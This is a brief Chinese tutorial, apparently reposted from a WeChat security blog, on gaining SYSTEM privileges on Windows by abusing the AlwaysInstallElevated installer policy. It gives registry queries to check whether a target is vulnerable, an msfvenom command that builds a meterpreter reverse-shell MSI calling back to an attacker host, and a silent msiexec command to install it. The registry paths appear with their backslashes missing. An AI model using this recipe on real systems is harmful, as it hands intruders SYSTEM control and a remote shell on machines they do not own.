MSI安装策略提权
MSI安装策略提权是用户在配置MSI安装策略时,启用了”永远以高特权进行安装“(默认情况下为禁用状态),导致任何用户都可以以system权限安装MSI,这样就可以在目标机安装一个预先制作的恶意MSI文件,以获得system权限。
确定系统是否存在漏洞
利用AlwaysInstallElevated提权关键是,启用永远以高特权安装。
启用高特权安装后,系统会自动在以下两个位置创建键值”1“
HKEY_CURRENT_USERSOFTWAREPoliciesMicrosoftWindowsInstaller /v AlwaysInstallElevated
HKEY_LOCAL_MACHINESOFTWAREPoliciesMicrosoftWindowsInstaller /v AlwaysInstallElevated
执行以下命令,通过查看注册表键值确定目标系统是否开启AlwaysInstallElevated选项。
reg query HKLMSOFTWAREPoliciesMicrosoftWindowsInstaller /v AlwaysInstallElevated
reg query HKCUSOFTWAREPoliciesMicrosoftWindowsInstaller /v AlwaysInstallElevated
或
reg query HKEY_CURRENT_USERSOFTWAREPoliciesMicrosoftWindowsInstaller /v AlwaysInstallElevated
reg query HKEY_LOCAL_MACHINESOFTWAREPoliciesMicrosoftWindowsInstaller /v AlwaysInstallElevated
创建恶意MSI并安装
确定目标系统存在该漏洞后,上传创建的MSI到目标机,运行即可。
msfvenom -p windows/meterpreter/reverse_http LHOST=csServerIp LPORT=ListenPort -f msi -o reverse_tcp.msi
# 生成反弹shell的msi安装程序
msiexec /quiet /qn /i reverse_http_80.msi
# 使用系统自带的安装应用msiexec运行msi程序
# /quite,在安装期间禁止向用户发送任何消息;/qn,无GUI模式允许;/i,常规安装
总结
愿大家健康开心。
原文始发于微信公众号(AlertSec):MSI安装策略提权
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论